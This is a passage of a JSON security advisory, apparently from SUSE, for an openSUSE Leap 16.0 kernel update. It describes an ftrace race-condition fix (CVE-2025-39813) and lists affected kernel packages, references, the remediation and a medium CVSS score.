"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T13:03:55Z",
"details": "moderate"
}
],
"title": "CVE-2025-39795"
},
{
"cve": "CVE-2025-39813",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-39813"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nftrace: Fix potential warning in trace_printk_seq during ftrace_dump\n\nWhen calling ftrace_dump_one() concurrently with reading trace_pipe,\na WARN_ON_ONCE() in trace_printk_seq() can be triggered due to a race\ncondition.\n\nThe issue occurs because:\n\nCPU0 (ftrace_dump) CPU1 (reader)\necho z \u003e /proc/sysrq-trigger\n\n!trace_empty(\u0026iter)\ntrace_iterator_reset(\u0026iter) \u003c- len = size = 0\n cat /sys/kernel/tracing/trace_pipe\ntrace_find_next_entry_inc(\u0026iter)\n __find_next_entry\n ring_buffer_empty_cpu \u003c- all empty\n return NULL\n\ntrace_printk_seq(\u0026iter.seq)\n WARN_ON_ONCE(s-\u003eseq.len \u003e= s-\u003eseq.size)\n\nIn the context between trace_empty() and trace_find_next_entry_inc()\nduring ftrace_dump, the ring buffer data was consumed by other readers.\nThis caused trace_find_next_entry_inc to return NULL, failing to populate\n`iter.seq`. At this point, due to the prior trace_iterator_reset, both\n`iter.seq.len` and `iter.seq.size` were set to 0. Since they are equal,\nthe WARN_ON_ONCE condition is triggered.\n\nMove the trace_printk_seq() into the if block that checks to make sure the\nreturn value of trace_find_next_entry_inc() is non-NULL in\nftrace_dump_one(), ensuring the \u0027iter.seq\u0027 is properly populated before\nsubsequent operations.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-39813",
"url": "https://www.suse.com/security/cve/CVE-2025-39813"
},
{
"category": "external",
"summary": "SUSE Bug 1250032 for CVE-2025-39813",
"url": "https://bugzilla.suse.com/1250032"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
